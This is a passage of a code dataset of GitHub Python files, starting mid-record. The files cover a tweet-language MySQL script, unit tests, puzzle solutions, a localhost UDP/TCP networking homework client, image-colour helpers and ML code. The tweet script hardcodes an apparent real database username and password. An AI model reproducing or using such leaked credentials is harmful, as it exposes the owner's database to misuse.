userModule):\n\tmoduleNames.append(userModule)\n\treturn\n\n\ndef typeToStr(ttype):\n\tif ttype == UNKNOWN:\n\t\treturn \"UNKNOWN\"\n\tif ttype == IDENTIFIER:\n\t\treturn \"IDENTIFIER\"\n\tif ttype == 
USER_MOD_PY:\n\t\treturn \"USER_MOD_PY\"\n\tif ttype == USER_MOD_SHELL:\n\t\treturn \"USER_MOD_SHELL\"\n\tif ttype == MOD_PARAMS:\n\t\treturn \"MOD_PARAMS\"\n\tif ttype == REGEX:\n\t\treturn \"REGEX\"\n\treturn \"UNDEFINED\"\n\n\ndef opTypeToStr(opType):\n\tif opType == UNARY:\n\t\treturn \"UNARY\"\n\tif opType == BINARY:\n\t\treturn \"BINARY\"\n\tif opType == NO_OP:\n\t\treturn \"NO_OP\"\n\treturn \"UNDEFINED\"\n","repo_name":"redshodan/cairn","sub_path":"src/python/cairn/sysdefs/ModuleSpec.py","file_name":"ModuleSpec.py","file_ext":"py","file_size_in_byte":10091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"34704635898","text":"from pymongo import MongoClient\nimport mysql.connector\nfrom lxml import html\nimport numpy as np\nimport traceback\nfrom re import *\nimport operator\nimport requests\nimport MySQLdb\nimport twython\nimport logging\nimport codecs\nimport json\nimport time\nimport os\nimport re \ndate = time.strftime(\"%Y%m%d\")\ndate = \"20200814\"\nuser_dict = {}\ndbm = mysql.connector.connect(host='localhost',\n                     user='rmacy',\n                     passwd='RWM3cyrus',\n                     db='Elite_Weekly')\ncursor = dbm.cursor()\n\ncommand = \"SELECT DISTINCT user_id,lang,COUNT(tweet_id) FROM Elite_Weekly.tweet_%s GROUP BY user_id,lang;\" % date\nprint (command)\ncursor.execute(command)\nresults = cursor.fetchall()\nfor i in range(len(results)):\n    results[i] = re.sub(r'\\\\(u\\\\'([0-9]*)\\\\', u\\\\'([a-z]*)\\\\', ([0-9]*)\\\\)', r'\\\\g<1> \\\\g<2> \\\\g<3>', str(results[i]))\n    #print(results[i]) #parse out the pieces needed, for instance results[i][2] has 508) with a trailing parenthesis\n    \n    results[i] = results[i].split()\n    #print(results[i])\n    #print(results[i][0])\n\n    wow = results[i][0]\n    templen = len(wow)-2\n    wow = wow[2:templen]\n    results[i][0] = wow\n    \n    languages = results[i][1]\n    templen2 = len(languages)-2\n    languages = languages[1:templen2]\n    results[i][1] = languages\n\n    counter = results[i][2]\n    templen3 = len(counter)-1\n    counter = counter[0:templen3]\n    results[i][2] = counter\n\n    print(results[i][0])\n    print(results[i][1])\n    print(results[i][2])\n    results[i][2] = int(results[i][2])\n    print(results[i][2])\n    if(results[i][0] not in user_dict.keys()):\n        user_dict[results[i][0]] = [results[i][1], results[i][2]]\n        print(user_dict[results[i][0]])\n    elif(user_dict[results[i][0]][1] < results[i][2]):\n        user_dict[results[i][0]] = [results[i][1], results[i][2]]\n        print(user_dict[results[i][0]])\n\n\ncommand = \"SELECT DISTINCT user_id,COUNT(tweet_id) FROM Elite_Weekly.tweet_%s GROUP BY user_id;\" %date\nprint (command)\ncursor.execute(command)\nuser_tweet_counts = cursor.fetchall()\nfor i in range(len(user_tweet_counts)):\n    user_tweet_counts[i] = re.sub(r'\\\\(u\\\\'([0-9]*)\\\\', ([0-9]*)\\\\)', r'\\\\g<1> \\\\g<2>', str(user_tweet_counts[i]))\n    user_tweet_counts[i] = user_tweet_counts[i].split()\n\n    first_param = user_tweet_counts[i][0]\n    length = len(first_param)-2\n    first_param = first_param[2:length]\n    user_tweet_counts[i][0] = first_param\n\n    #print(user_tweet_counts[i][0])\n\n    second_param = user_tweet_counts[i][1]\n    length = len(second_param)-1\n    second_param = second_param[0:length]\n    user_tweet_counts[i][1] = second_param\n\n    user_tweet_counts[i][1] = int(user_tweet_counts[i][1])\n    user_dict[user_tweet_counts[i][0]][1] = float(user_dict[user_tweet_counts[i][0]][1])/float(user_tweet_counts[i][1])\n\nlanguage_file = 'top12k_languages_' + date\nl_f = open(language_file, 'w')\nfor user in user_dict.keys():\n    for i in range(len(user_dict[user])):\n        
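# stringify both fields (top language, share of the user's tweets) so they can be ','-joined into the CSV line below\n        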
user_dict[user][i] = str(user_dict[user][i])\n l_f.write(str(user) + ',' + ','.join(user_dict[user]) + '\\n')\nl_f.close()\nprint(\"done\")","repo_name":"eugenetan3/ONRG-REU","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"658010747","text":"\"\"\"\r\ntest furnishings.py and the various\r\nbits of furniture defined there.\r\n\"\"\"\r\nimport unittest\r\nfrom furnishings import Furnishing, Sofa, Bookshelf, Bed, Table, map_the_home, counter\r\n\r\nclass TestFurnishings(unittest.TestCase):\r\n def test_furniture(self):\r\n \"Basic test of classes derived from Furnishing\"\r\n furnishing = Furnishing(\"Kitchen\")\r\n sofa = Sofa('Living Room')\r\n bookshelf = Bookshelf('Library')\r\n bed = Bed('Bedroom')\r\n table = Table('Dining Room')\r\n self.assertEqual(furnishing.room, 'Kitchen')\r\n self.assertEqual(sofa.room, 'Living Room')\r\n self.assertEqual(bookshelf.room, 'Library')\r\n self.assertEqual(bed.room, 'Bedroom')\r\n self.assertEqual(table.room, 'Dining Room')\r\n \r\n self.assertEqual(sofa.name, 'Sofas')\r\n self.assertEqual(bookshelf.name, 'Bookshelves')\r\n self.assertEqual(bed.name, 'Beds')\r\n self.assertEqual(table.name, 'Tables')\r\n \r\n def test_map_the_home(self):\r\n # make sure it handles objects not derived from Furnishing\r\n home = [Bed('Bedroom'), 1, [1,2,3]]\r\n with self.assertRaises(AttributeError):\r\n map_the_home(home)\r\n \r\n # works as expected\r\n home = [Bed('Bedroom'), Sofa('Living Room')]\r\n result = map_the_home(home)\r\n self.assertTrue(isinstance(result['Bedroom'][0], Bed))\r\n self.assertTrue(isinstance(result['Living Room'][0], Sofa))\r\n \r\n def test_counter(self):\r\n # make sure it handles objects not derived from Furnishing\r\n home = [Bed('Bedroom'), 1, [1,2,3]]\r\n with self.assertRaises(AttributeError):\r\n counter(home)\r\n \r\n # works as expected \r\n home = [Bed('Bedroom'), Sofa('Living Room')]\r\n expected = \"Beds: 1\\nBookshelves: 0\\nSofas: 1\\nTables: 0\"\r\n self.assertEqual(counter(home), expected)\r\n \r\nif __name__ == \"__main__\":\r\n unittest.main()","repo_name":"rwehner/rl","sub_path":"homework/Python3_Homework07/src/test_furnishings.py","file_name":"test_furnishings.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"27193217217","text":"import fileinput\nimport re\nfrom collections import defaultdict\n\nsquares = defaultdict(int)\nlines = [line for line in fileinput.input()]\nfor line in lines:\n claim, x, y, width, height = (int(n) for n in re.findall('(\\d+)', line))\n for i in range(width):\n for j in range(height):\n squares[x + i, y + j] += 1\n\nprint(sum(x > 1 for x in squares.values()))\n","repo_name":"folkol/adventofcode","sub_path":"2018/day3/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24050522371","text":"import socket\nfrom struct import *\nimport math\n\n\n\n############################################### Part1 ################################################\n# Stage a\n\n# Step a1\n# server = \"attu2.cs.washington.edu\"\nserver = \"localhost\"\nport = 12235 # UDP port\nstudentNum = 243 # last 3 digits of my student number\nmessage = pack(\">IIHH12s\", 12, 0, 1, studentNum, bytes(\"hello world\", 'ascii'))\nprint(\"a1 sent: \", 
message)\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(message, (server, port))\n\npacket = sock.recv(28)\nprint(\"a2 receive: \", unpack(\">IIHHIIII\", packet))\npayload_len, psecret, step, student, num, len_b, udp_port, secretA = unpack(\">IIHHIIII\", packet)\n\n# Stage b\npacket_id = 0\nwhile packet_id < num:\n padded_len = str(int((len_b + 3) / 4) * 4)\n temp = \">IIHHI\" + padded_len + \"s\"\n message = pack(temp, len_b + 4, secretA, 1, studentNum, packet_id, bytes(0))\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.sendto(message, (server, udp_port))\n sock.settimeout(0.5)\n try:\n packet = sock.recv(16)\n except socket.timeout:\n continue\n payload_len, psecret, step, student, ack = unpack(\">IIHHI\", packet)\n if (ack == packet_id) :\n packet_id = packet_id + 1\n\npacket = sock.recv(20)\nprint(\"b receive: \", unpack(\">IIHHII\", packet))\npayload_len, psecret, step, student, tcp_port, secretB = unpack(\">IIHHII\", packet)\n\n# Stage c\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((server, tcp_port))\npacket = sock.recv(28)\nprint(\"c receive: \", unpack(\">IIHHIIIc\", packet[:25]))\npayload_len, psecret, step, student, num2, len2, secretC, c = unpack(\">IIHHIIIc\", packet[:25])\n\n# Stage d\nfor i in range(num2):\n p_length = math.ceil(len2 / 4) * 4\n temp = \">IIHH\" + str(p_length) + \"s\"\n message = pack(temp, len2, secretC, 1, studentNum, c * p_length)\n # print(len(message), message)\n sock.send(message)\n\npacket = sock.recv(16)\nprint(\"d receive: \", unpack(\">IIHHI\", packet[:16]))\npayload_len, psecret, step, student, secretD = unpack(\">IIHHI\", packet[:16])\n\nprint(secretA, secretB, secretC, secretD)\n","repo_name":"szbslsx/CSE461","sub_path":"hw1/part1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23097829352","text":"from absl.testing import parameterized\nimport numpy as np\nimport tensorflow as tf, tf_keras\nfrom official.recommendation.uplift import keras_test_case\nfrom official.recommendation.uplift import types\nfrom official.recommendation.uplift.metrics import treatment_fraction\n\n\nclass TreatmentFractionTest(\n keras_test_case.KerasTestCase, parameterized.TestCase\n):\n\n def _get_y_pred(\n self, is_treatment: tf.Tensor\n ) -> types.TwoTowerTrainingOutputs:\n # Only the is_treatment tensor is required for testing.\n return types.TwoTowerTrainingOutputs(\n shared_embedding=tf.ones_like(is_treatment),\n control_predictions=tf.ones_like(is_treatment),\n treatment_predictions=tf.ones_like(is_treatment),\n uplift=tf.ones_like(is_treatment),\n control_logits=tf.ones_like(is_treatment),\n treatment_logits=tf.ones_like(is_treatment),\n true_logits=tf.ones_like(is_treatment),\n is_treatment=is_treatment,\n )\n\n @parameterized.named_parameters(\n {\n \"testcase_name\": \"unweighted\",\n \"is_treatment\": tf.constant([[True], [False], [True], [False]]),\n \"sample_weight\": None,\n \"expected_result\": 0.5,\n },\n {\n \"testcase_name\": \"weighted\",\n \"is_treatment\": tf.constant(\n [[True], [False], [True], [True], [False]]\n ),\n \"sample_weight\": tf.constant([0.5, 0.5, 0, 0.7, 1.8]),\n \"expected_result\": np.average(\n [1, 0, 1, 1, 0], weights=[0.5, 0.5, 0, 0.7, 1.8]\n ),\n },\n {\n \"testcase_name\": \"only_control\",\n \"is_treatment\": tf.constant([[False], [False], [False]]),\n \"sample_weight\": tf.constant([1, 0, 1]),\n \"expected_result\": 0.0,\n 
},\n {\n \"testcase_name\": \"only_treatment\",\n \"is_treatment\": tf.constant([[True], [True], [True]]),\n \"sample_weight\": tf.constant([0, 1, 1]),\n \"expected_result\": 1.0,\n },\n {\n \"testcase_name\": \"one_entry\",\n \"is_treatment\": tf.constant([True]),\n \"sample_weight\": None,\n \"expected_result\": 1.0,\n },\n {\n \"testcase_name\": \"no_entry\",\n \"is_treatment\": tf.constant([], dtype=tf.bool),\n \"sample_weight\": tf.constant([]),\n \"expected_result\": 0.0,\n },\n )\n def test_treatment_fraction_computes_weighted_mean_of_is_treatment_tensor(\n self, is_treatment, sample_weight, expected_result\n ):\n metric = treatment_fraction.TreatmentFraction()\n y_true = tf.zeros_like(is_treatment)\n y_pred = self._get_y_pred(is_treatment)\n metric.update_state(\n y_true=y_true, y_pred=y_pred, sample_weight=sample_weight\n )\n self.assertEqual(expected_result, metric.result())\n\n def test_multiple_update_batches_returns_aggregated_treatment_fractions(self):\n metric = treatment_fraction.TreatmentFraction()\n\n metric.update_state(\n y_true=tf.zeros(3),\n y_pred=self._get_y_pred(tf.constant([[True], [True], [True]])),\n sample_weight=None,\n )\n metric.update_state(\n y_true=tf.zeros(3),\n y_pred=self._get_y_pred(tf.constant([[False], [False], [False]])),\n sample_weight=None,\n )\n metric.update_state(\n y_true=tf.zeros(3),\n y_pred=self._get_y_pred(tf.constant([[True], [False], [True]])),\n sample_weight=tf.constant([0.3, 0.25, 0.7]),\n )\n\n expected_treatment_fraction = np.average(\n [1, 1, 1, 0, 0, 0, 1, 0, 1], weights=[1, 1, 1, 1, 1, 1, 0.3, 0.25, 0.7]\n )\n self.assertEqual(expected_treatment_fraction, metric.result())\n\n def test_initial_and_reset_state_return_zero_treatment_fraction(self):\n metric = treatment_fraction.TreatmentFraction()\n self.assertEqual(0.0, metric.result())\n\n metric(\n y_true=tf.zeros(3),\n y_pred=self._get_y_pred(tf.constant([[True], [False], [True]])),\n )\n self.assertEqual(2 / 3, metric.result())\n\n metric.reset_states()\n self.assertEqual(0.0, metric.result())\n\n def test_metric_config_is_serializable(self):\n metric = treatment_fraction.TreatmentFraction(\n name=\"test_name\", dtype=tf.float16\n )\n y_pred = self._get_y_pred(\n is_treatment=tf.constant([[True], [False], [True], [False]]),\n )\n self.assertLayerConfigurable(\n layer=metric, y_true=tf.zeros(4), y_pred=y_pred, serializable=True\n )\n\n def test_invalid_prediction_tensor_type_raises_type_error(self):\n metric = treatment_fraction.TreatmentFraction()\n\n with self.assertRaisesRegex(\n TypeError, \"y_pred must be of type `TwoTowerTrainingOutputs`\"\n ):\n metric.update_state(y_true=tf.ones((3, 1)), y_pred=tf.ones((3, 1)))\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","repo_name":"MullTriX/Cat-Recognition","sub_path":"official/recommendation/uplift/metrics/treatment_fraction_test.py","file_name":"treatment_fraction_test.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18362062881","text":"import numpy as np\nimport cv2\n\n\nclass Rect(object):\n def __init__(self, x1, y1, x2, y2):\n super().__init__()\n self.x1 = int(x1)\n self.x2 = int(x2)\n self.y1 = int(y1)\n self.y2 = int(y2)\n \n def __repr__(self):\n return f\"x1 - {self.x1},\\\n y1 - {self.y1},\\\n x2 - {self.x2},\\\n y2 - {self.y2}\"\n\n\ndef hex_to_rgb(h: str):\n return tuple(int(h[i:i+2], 16) for i in (0, 2, 4))\n\n\ndef rgb_to_hex(rgb):\n return str.upper('%02x%02x%02x' % tuple(rgb))\n\n\nhex_color_map = 
{\n \"FFFDD0\": \"Кремовый\",\n \"000000\": \"Черный\",\n \"7B3F00\": \"Шоколадный\",\n \"BEBEBE\": \"Серый\",\n \"00BFFF\": \"Голубой\",\n \"91302B\": \"Рыжий\",\n \"FFFFFF\": \"Белый\"\n}\n\n\ncolors = np.array([hex_to_rgb(elem) for elem in hex_color_map.keys()])\n\n\ndef get_mask(img, rect: Rect):\n mask = np.zeros(img.shape[:2],np.uint8)\n bgdModel = np.zeros((1,65),np.float64)\n fgdModel = np.zeros((1,65),np.float64)\n r = (rect.x1, rect.y1, rect.x2 - rect.x1, rect.y2 - rect.y1) # format : x,y,w,h and only int numbers\n cv2.grabCut(img,mask,r,bgdModel,fgdModel,5,cv2.GC_INIT_WITH_RECT)\n mask2 = np.where((mask==2)|(mask==0),0,1).astype('uint8')\n return mask2\n\n\ndef closest_colour(requested_colour):\n min_colours = {}\n for color in colors:\n r_c, g_c, b_c = color\n rd = (r_c - requested_colour[0]) ** 2\n gd = (g_c - requested_colour[1]) ** 2\n bd = (b_c - requested_colour[2]) ** 2\n min_colours[(rd + gd + bd)] = color\n return hex_color_map[rgb_to_hex(min_colours[min(min_colours.keys())])]\n\n\ndef count_colors(img, mask):\n reduced_img = img*mask[:,:,np.newaxis]\n count = {}\n for p in reduced_img[mask!=0]:\n res = closest_colour(p)\n if not count.get(res):\n count[res] = 0\n count[res] += 1\n return count\n\n\ndef choose_color(colors_count: dict):\n res_colors = np.array(sorted(list(colors_count.items()), key=lambda item: item[-1]))\n top = res_colors[:, -1][-3:].astype(np.float32)\n norm = np.linalg.norm(top)\n if ((top / norm <= 0.64) & (top / norm >= 0.5)).all():\n return [\"Многоцвет\"]\n else:\n return res_colors[-2:, 0].tolist()\n\n\ndef pred_color(img: np.ndarray, boxes: np.ndarray):\n res = []\n for box in boxes:\n rect = Rect(*box[:4])\n mask = get_mask(img, rect)\n res.append(choose_color(count_colors(img, mask)))\n return res\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"Makarov-Leonid/cat_breed_recognizer","sub_path":"app/colors_tools.py","file_name":"colors_tools.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13489246120","text":"#!/usr/bin/env python\n\nimport sys\nimport time\nimport array\nfrom Xlib import display, X\nimport wx\nwx.App()\n\nfrom skimage.transform import resize\nfrom skimage.util import img_as_float\nfrom skimage.io._plugins.pil_plugin import (pil_to_ndarray, ndarray_to_pil, _palette_is_grayscale)\nimport skimage.io as sio\n\nimport numpy as np\n\nfrom PIL import Image\n\n\n# CONSTANTS #\nSRC_W = 640\nSRC_H = 480\nSRC_D = 3\nOFFSET_X = 400\nOFFSET_Y = 240\n\nIMG_W = 200\nIMG_H = 66\nIMG_D = 3\n\n\ndef original_take_screenshot():\n screen = wx.ScreenDC()\n size = screen.GetSize()\n bmp = wx.Bitmap(size[0], size[1])\n mem = wx.MemoryDC(bmp)\n mem.Blit(0, 0, size[0], size[1], screen, 0, 0)\n return bmp.GetSubBitmap(wx.Rect([0,0],[SRC_W,SRC_H]))\n\n\ndef modified_take_screenshot():\n screen = wx.ScreenDC()\n bmp = wx.Bitmap(SRC_W, SRC_H)\n mem = wx.MemoryDC(bmp)\n mem.Blit(0, 0, SRC_W, SRC_H, screen, OFFSET_X, OFFSET_Y)\n return bmp\n\ndef alternative_take_screenshot():\n dsp = display.Display()\n root = dsp.screen().root\n raw = root.get_image(0, 0, SRC_W, SRC_H, X.ZPixmap, 0xffffffff)\n image = Image.frombytes(\"RGB\", (SRC_W, SRC_H), raw.data, \"raw\", \"BGRX\")\n return image\n\n\ndef original_prepare_image(img):\n buf = img.ConvertToImage().GetData()\n img = np.frombuffer(buf, dtype='uint8')\n\n img = img.reshape(SRC_H, SRC_W, SRC_D)\n img = resize(img, [IMG_H, IMG_W])\n\n return img\n\n\narr = array.array('B', [0] * (SRC_W * 
SRC_H * SRC_D))\ndef modified_prepare_image(img):\n    img.CopyToBuffer(arr)\n    img = np.frombuffer(arr, dtype=np.uint8)\n\n    img = img.reshape(SRC_H, SRC_W, SRC_D)\n\n    im = Image.fromarray(img)\n    im = im.resize((IMG_W, IMG_H))\n\n    im_arr = np.frombuffer(im.tobytes(), dtype=np.uint8)\n    im_arr = im_arr.reshape((IMG_H, IMG_W, IMG_D))\n\ndef alternative_prepare_image(image):\n    if str(type(image)) == \"<class 'PIL.Image.Image'>\":\n        image = pil_to_ndarray(image)\n    ndar = image.reshape(SRC_H, SRC_W, SRC_D)\n    im = Image.fromarray(ndar)\n    im = im.resize((IMG_W, IMG_H))\n    im_arr = np.frombuffer(im.tobytes(), dtype=np.uint8) # in: object exposing buffer interface, out: ndarray\n    im_arr = im_arr.reshape((IMG_H, IMG_W, IMG_D)) # 200, 66, 3\n\n\n\ndef call_original():\n    bmp = original_take_screenshot()\n    vec = original_prepare_image(bmp)\n\n\ndef call_modified():\n    bmp = modified_take_screenshot()\n    vec = modified_prepare_image(bmp)\n\ndef call_alternative():\n    bmp = alternative_take_screenshot()\n    vec = alternative_prepare_image(bmp)\n\n\nif __name__ == '__main__':\n    import timeit\n\n    try:\n        n = int(sys.argv[1])\n    except (ValueError, IndexError) as e:\n        n = 100\n\n    print(\"# Running tests \" + str(n) + \" times\")\n\n    # print(\"#\")\n    # print(\"# ORIGINAL:\")\n    # print(timeit.timeit(\"call_original()\", setup=\"from __main__ import call_original;\", number=n))\n\n    # print(\"#\")\n    # print(\"# MODIFIED:\")\n    # print(timeit.timeit(\"call_modified()\", setup=\"from __main__ import call_modified;\", number=n))\n    \n    print(\"#\")\n    print(\"# ALTERNATIVE:\")\n    print(timeit.timeit(\"call_alternative()\", setup=\"from __main__ import call_alternative;\", number=n))\n\n######################################################\n# SOME RESULTS #\n#\n# Running tests 10000 times\n#\n# ORIGINAL:\n# 1210.20094013\n#\n# MODIFIED:\n# 313.987584114\n#\n#\n# Running tests 10000 times\n#\n# ORIGINAL:\n# 1074.97350001\n#\n# MODIFIED:\n# 270.604922056\n#\n\n# Running tests 10 times\n#\n# ALTERNATIVE:\n# 0.150660037994\n \n# Running tests 100 times\n#\n# ALTERNATIVE:\n# 1.30269503593\n\n# Running tests 200 times\n#\n# ALTERNATIVE:\n# 2.69465994835\n# Running tests 50 times\n#\n# ALTERNATIVE:\n# 0.64985203743\n# 150\n# 1.98458385468\n\n######################################################\n \n\n######################################################\n# RESULTS DURING ACTUAL UTILS.PY PREPARE RUN #\n#\n# Preparing 4493 samples (8 races)\n#\n# ORIGINAL CODE: ~280s\n#\n# MODIFIED CODE: ~90s\n#\n######################################################\n \n\n######################################################\n# RESULTS DURING ACTUAL PLAY.PY RUN #\n#\n# ORIGINAL CODE:\n# Screenshot Prepare Image Model Eval\n# Avg Times (500): 0.000318816661835 0.136291568279 0.0443236446381\n#\n# MODIFIED CODE:\n# Screenshot Prepare Image Model Eval\n# Avg Times (500): 0.000203844547272 0.0492500219345 0.0412494616508\n#\n# IMPROVEMENT (AS % DECREASE OVER ORIGINAL):\n# Screenshot Prepare Image Model Eval\n# 36.06% 63.86% 6.94% (execution variance - no changes)\n#\n######################################################\n\n\n","repo_name":"DistributedSystemsGroup/tensorkart","sub_path":"tests/perfTests.py","file_name":"perfTests.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70982065497","text":"from torch import Tensor\nfrom torch.autograd import Variable\nfrom torch.optim import Adam\nfrom misc import hard_update, gumbel_softmax, onehot_from_logits\nfrom policies import 
DiscretePolicy\n\n\nclass AttentionAgent(object):\n\n def __init__(self, num_in_pol, num_out_pol, hidden_dim=64,\n lr=0.01, onehot_dim=0):\n\n self.policy = DiscretePolicy(num_in_pol, num_out_pol,\n hidden_dim=hidden_dim,\n onehot_dim=onehot_dim)\n self.target_policy = DiscretePolicy(num_in_pol, num_out_pol,\n hidden_dim=hidden_dim,\n onehot_dim=onehot_dim)\n\n hard_update(self.target_policy, self.policy)\n self.policy_optimizer = Adam(self.policy.parameters(), lr=lr)\n\n def step(self, obs, explore=False):\n\n return self.policy(obs, sample=explore)\n\n def get_params(self):\n return {'policy': self.policy.state_dict(),\n 'target_policy': self.target_policy.state_dict(),\n 'policy_optimizer': self.policy_optimizer.state_dict()}\n\n def load_params(self, params):\n self.policy.load_state_dict(params['policy'])\n self.target_policy.load_state_dict(params['target_policy'])\n self.policy_optimizer.load_state_dict(params['policy_optimizer'])\n\n","repo_name":"hyunrrr/maac_gfootball","sub_path":"agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70982065497","text":"# Write a function is_member() that takes a value (i.e. a number, string, etc)\n# x and a list of values a, and\n# returns True if x is a member of a, False otherwise.\n# (Note that this is exactly what the in operator does,\n# but for the sake of the exercise you should pretend\n# Python did not have this operator.)\n\ndef is_member(z, list1):\n if z in list1:\n return True\n else:\n return False\n\n\nlist1 = [1, 2, 3, 4, 5, 6]\nprint(is_member(6, list1))\n\n\ndef member_val(checkVal, list2):\n for i in range(len(list2)):\n if checkVal == list2[i]:\n return True\n\n\nlist2 = [1, 2, 3, 4, 5, 6]\nprint(member_val(4, list2))\n\n\ndef mem_val(chek, list3):\n for i in range(0, list3):\n if list3.count(chek) > 0:\n return True\n\n\nlist3 = [1, 2, 3, 4, 5]\nchek = 3\nprint(member_val(chek, list3))\n","repo_name":"arpit0712-test/47_Hard_Python-problems","sub_path":"Q9/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9579382296","text":"\r\nfile1 = open('abc.txt','w')\r\nl = [\"The Sas service is unavailable \\n\",\"please wait untill the Service Restored !!! 
\\n\"]\r\nfile1.writelines(l)\r\n\r\nfile1.close()\r\n\r\nfile2 = open('xyz.txt','w')\r\nl = [\"This is the second file\\n\"]\r\nfile2.writelines(l)\r\n\r\nfile2.close()\r\n\r\ndef remove_lowercase(file1,file2):\r\n f1 = open(file1)\r\n txt1=f1.read()\r\n \r\n f2=open(file2,'w')\r\n sentences=txt1.split()\r\n for word in sentences:\r\n mixed = not word.islower() and not word.isupper()\r\n if mixed:\r\n f2.write(word)\r\n f2.write('\\n')\r\n\r\nremove_lowercase('abc.txt','xyz.txt')\r\nwith open ('xyz.txt','r+') as file:\r\n\r\n text = file.read()\r\n print(text)","repo_name":"udghosh/Practice","sub_path":"file_handling_5.py","file_name":"file_handling_5.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39686537486","text":"import random\n\n# Problem code\nclass Solution:\n def __init__(self, nums):\n self.table = {}\n for index, num in enumerate(nums):\n if num in self.table:\n self.table[num].append(index)\n else:\n self.table[num] = [index]\n\n def pick(self, target):\n array = self.table[target]\n return random.choice(array)\n\n# Setup\na = [7,1,5,7,6,4,7]\nobj = Solution(a)\nparam_1 = obj.pick(7)\nprint(\"Random 7 from array has index \" + str(param_1))\n","repo_name":"Voley/AlgorithmicProblemsV2","sub_path":"Arrays/index/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"11669514919","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('qa', '0013_auto_20150210_1002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Voter',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('answer', models.ForeignKey(to='qa.Answer')),\n ('user', models.ForeignKey(to='qa.UserProfile')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='answer',\n name='votes',\n ),\n migrations.AlterField(\n model_name='userprofile',\n name='picture',\n field=models.ImageField(upload_to=b'profile_images', blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"softdevelop/PurNet","sub_path":"Djangoproj/PurNet/qa/migrations/0014_auto_20150212_0636.py","file_name":"0014_auto_20150212_0636.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39581880282","text":"\nfrom itertools import zip_longest\nimport sys\nfrom typing import List\nimport pytest\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = self.right = None\n self.cnt = 1\n self.size = 1\n\n def __repr__(self):\n left = repr(self.left).split('\\n') if self.left else ['']\n right = repr(self.right).split('\\n') if self.right else ['']\n if not left and not right:\n return str(self.val)\n else:\n lines = [' ' * len(left[0]) + str(self.val)]\n for l, r in zip_longest(left, right):\n lines.append(f'{l or \"\"} {r or \"\"}')\n return '\\n'.join(lines)\n\n\nclass SegmentTree:\n def __init__(self):\n self.root = None\n\n def insert(self, val):\n if self.root is None:\n self.root = Node(val)\n return\n node = self.root\n while node is not None:\n node.size += 1\n if val < node.val:\n if not node.left:\n node.left = Node(val)\n break\n else:\n node = 
node.left\n elif val > node.val:\n if not node.right:\n node.right = Node(val)\n break\n else:\n node = node.right\n else:\n node.cnt += 1\n return\n\n def cnt_smaller(self, val, include_equals=False):\n if not self.root:\n return 0\n ret = 0\n node = self.root\n while node:\n if val < node.val:\n node = node.left\n elif val > node.val:\n ret += node.size\n node = node.right\n ret -= node.size if node else 0\n else:\n ret += node.left.size if node.left else 0\n if include_equals:\n return ret + node.cnt\n else:\n return ret\n return ret\n\n def __repr__(self):\n return repr(self.root)\n\n\nclass Solution:\n def countRangeSum(self, nums: List[int], lower: int, upper: int) -> int:\n if not nums:\n return 0\n tree = SegmentTree()\n tree.insert(0)\n ret = 0\n s = 0\n for n in nums:\n s += n\n # lower <= s - x <= upper\n # s - upper <= x <= s - lower\n i = tree.cnt_smaller(s - upper)\n j = tree.cnt_smaller(s - lower, include_equals=True)\n tree.insert(s)\n ret += j-i\n return ret\n\n\n@pytest.mark.parametrize('nums, lower, upper, expected', [\n ([-2,5,-1], -2, 2, 3),\n ([0,-3,-3,1,1,2], 3, 5, 2),\n])\ndef test(nums, lower, upper, expected):\n assert expected == Solution().countRangeSum(nums, lower, upper)\n\n\nif __name__ == '__main__':\n sys.exit(pytest.main([\"-s\", \"-v\"] + sys.argv))\n","repo_name":"sungminoh/algorithms","sub_path":"leetcode/solved/327_Count_of_Range_Sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7953990078","text":"#!/usr/bin/env python3\n\nimport 